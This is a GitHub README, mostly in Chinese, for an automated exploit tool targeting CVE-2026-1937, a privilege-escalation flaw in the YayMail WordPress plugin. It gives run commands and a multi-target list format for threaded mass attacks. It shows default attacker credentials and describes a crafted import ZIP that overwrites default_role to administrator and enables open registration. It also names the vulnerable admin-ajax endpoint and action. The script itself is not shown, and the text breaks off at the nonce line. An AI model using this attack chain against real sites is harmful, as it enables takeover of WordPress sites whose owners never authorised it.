Nxploited/CVE-2026-1937
GitHub: Nxploited/CVE-2026-1937
针对 YayMail 插件权限提升漏洞的自动化 PoC 利用工具,实现从注册到管理员权限获取的全链路攻击。
Stars: 0 | Forks: 0
```
## 📋 系统要求
### 系统需求
- Python **3.8** 或更高版本
- Linux / Windows / macOS
- `yaymail_backup.zip` — 精心制作的导入载荷文件(**必需**)
### Python 依赖
```
pip install requests urllib3 rich
```
或通过依赖文件安装:
```
pip install -r requirements.txt
```
**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0
```
## 🚀 安装
```
# 克隆仓库
git clone https://github.com/Nxploited/CVE-2026-1937.git
cd CVE-2026-1937
# 安装依赖
pip install -r requirements.txt
# 将精心制作的导入有效载荷放在同一目录中
cp /path/to/yaymail_backup.zip .
# 运行工具
python3 CVE-2026-1937.py
```
## ⚙️ 使用方法
### 基础运行
```
python3 CVE-2026-1937.py
```
该工具使用由 **Rich** 驱动的完整交互式终端界面。
### 🗂️ 目标列表格式
创建一个纯文本文件(默认:`list.txt`),每行一个目标:
```
https://target1.com
https://target2.com
http://target3.com
target4.com
```
### 🖥️ 交互式提示
```
Username [Nx_admin]: Nx_admin
Password [Nx_adminSA]: Nx_adminSA
Email [Nx_admin@admin.sa]: Nx_admin@admin.sa
Targets file [list.txt]: list.txt
Threads [3]: 5
HTTP timeout (seconds) [10]: 10
```
## 📦 载荷文件 — `yaymail_backup.zip`
该利用需要一个 **精心制作的 YayMail 导入 ZIP 文件**,在导入时可覆盖以下 WordPress 选项:
| WordPress 选项 | 注入值 |
|---|---|
| `default_role` | `administrator` |
| `users_can_register` | `1` |
## 🔬 易受攻击的 AJAX 端点
```
POST /wp-admin/admin-ajax.php
```
```
action=yaymail_import_state
nonce=
© 2026 Nxploited (Khaled Alenazi) — 仅限授权安全研究使用。